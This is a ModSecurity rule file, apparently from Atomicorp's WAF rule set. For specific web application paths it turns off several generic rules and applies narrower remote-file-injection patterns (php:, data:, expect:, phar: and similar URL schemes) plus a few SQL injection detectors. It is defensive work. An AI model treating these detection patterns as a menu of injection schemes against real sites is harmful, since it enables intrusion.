SecRule REQUEST_FILENAME "/editcontent\.php" "phase:2,id:91128,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340161"
SecAction "phase:2,id:91129,t:none,pass,nolog,skipAfter:END_RULES_91129"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^content_/|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340561,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editcontent.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^content_/|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340562,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editcontent.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91129

SecRule REQUEST_FILENAME "/html2rss/rss\.aspx" "phase:2,id:91130,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91131,t:none,pass,nolog,skipAfter:END_RULES_91131"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:U "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340563,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/html2rss/rss.aspx)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:U "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340564,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/html2rss/rss.aspx)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91131

SecRule REQUEST_FILENAME "/winnder_step2\.1\.php" "phase:2,id:91132,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91133,t:none,pass,nolog,skipAfter:END_RULES_91133"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:rules|!ARGS:terms "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340565,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS ( /winnder_step2.1.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:rules|!ARGS:terms "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340566,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS ( /winnder_step2.1.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91133

SecRule REQUEST_FILENAME "/contact/website\.php" "phase:2,id:91134,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91135,t:none,pass,nolog,skipAfter:END_RULES_91135"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:txtComments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340567,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact/website.php )',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:txtComments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340568,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact/website.php )',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91135

SecRule REQUEST_FILENAME "/acp/template\.php" "phase:2,id:91136,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91137,t:none,pass,nolog,skipAfter:END_RULES_91137"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340569,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wbb/acp/template.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340570,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wbb/acp/template.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91137

SecRule REQUEST_FILENAME "/sregister2-p\.php" "phase:2,id:91138,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019"
SecAction "phase:2,id:91139,t:none,pass,nolog,skipAfter:END_RULES_91139"


SecRule ARGS|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:skills "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:346144,rev:12,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/sregister2-p.php)',deny,log,auditlog,status:403,phase:2"

SecMarker END_RULES_91139

SecRule REQUEST_FILENAME "/posting\.php" "phase:2,id:91140,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=390711"
SecAction "phase:2,id:91141,t:none,pass,nolog,skipAfter:END_RULES_91141"

SecRule ARGS|ARGS_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:/message/|!ARGS:/post/|!ARGS:/body/|!ARGS:/msg/|!ARGS:/text/|!ARGS:/txt/|!ARGS:topicseen|!ARGS_NAMES:posted_data[product_substring] "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" "id:344156,capture,t:none,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/posting.php)',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"

SecMarker END_RULES_91141

SecRule REQUEST_FILENAME "/phpmysupport/trackerimage\.php" "phase:2,id:91142,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91143,t:none,pass,nolog,skipAfter:END_RULES_91143"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:base "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340571,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/phpmysupport/trackerimage.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:base "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340572,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/phpmysupport/trackerimage.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91143

SecRule REQUEST_FILENAME "/chat\.php" "phase:2,id:91144,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91145,t:none,pass,nolog,skipAfter:END_RULES_91145"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dep|!ARGS:protocol "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340573,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/chat.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:prfl|!ARGS:prtcl|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dep|!ARGS:protocol|!ARGS:psswrd "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340574,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/chat.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91145

SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:91146,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91147,t:none,pass,nolog,skipAfter:END_RULES_91147"

#SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:wpau-ftphost|!ARGS:adsensem-code|!ARGS:addresses|!ARGS:referredby|!ARGS:adrotate_bannercode "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340575,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wp-admin/edit.php)'"
#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

#SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:wpau-ftphost|!ARGS:adsensem-code|!ARGS:addresses|!ARGS:referredby|!ARGS:adrotate_bannercode "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340576,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wp-admin/edit.php)'"
#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91147

SecRule REQUEST_FILENAME "/egroupware/etemplate/process_exec\.php" "phase:2,id:91148,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91149,t:none,pass,nolog,skipAfter:END_RULES_91149"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:exec[text]|!ARGS:/link/|!ARGS:/referer/|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340577,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/egroupware/etemplate/process_exec.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:exec[text]|!ARGS:/link/|!ARGS:/referer/|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340578,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/egroupware/etemplate/process_exec.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91149

SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91150,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854,ctl:ruleRemovebyID=341057,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/acollab/install/install\.php" "phase:2,id:91151,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91152,t:none,pass,nolog,skipAfter:END_RULES_91152"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:upload_dir "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340581,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/acollab/install/install.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:upload_dir "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340582,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/acollab/install/install.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91152

SecRule REQUEST_FILENAME "/includes/popup\.php" "phase:2,id:91153,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91154,t:none,pass,nolog,skipAfter:END_RULES_91154"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:z "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340583,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/includes/popup.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:z "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340584,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/includes/popup.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91154

SecRule REQUEST_FILENAME "/cgi-bin/cgiemail/testform\.txt" "phase:2,id:91155,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91156,t:none,pass,nolog,skipAfter:END_RULES_91156"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:success "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340585,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/cgiemail/testform.txt)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:success "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340586,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/cgiemail/testform.txt)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91156

SecRule REQUEST_FILENAME "/admin/doeditboard\.php" "phase:2,id:91157,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91158,t:none,pass,nolog,skipAfter:END_RULES_91158"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:headerfile|!ARGS:intro_body "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340587,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/doeditboard.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:headerfile|!ARGS:intro_body "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340588,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/doeditboard.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91158

SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:91159,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91160,t:none,pass,nolog,skipAfter:END_RULES_91160"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pictureremote "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340589,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/anyinventory/admin/item_processor.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pictureremote "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340590,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/anyinventory/admin/item_processor.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91160

SecRule REQUEST_FILENAME "/modules/fckeditor/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:91161,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91162,t:none,pass,nolog,skipAfter:END_RULES_91162"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340591,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/default/browser.html)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340592,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/default/browser.html)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91162

SecRule REQUEST_FILENAME "/modules/mod_shoutbox\.php" "phase:2,id:91163,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91164,t:none,pass,nolog,skipAfter:END_RULES_91164"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:c|!ARGS:metodista "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:341592,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:c|!ARGS:metodista "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340593,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91164

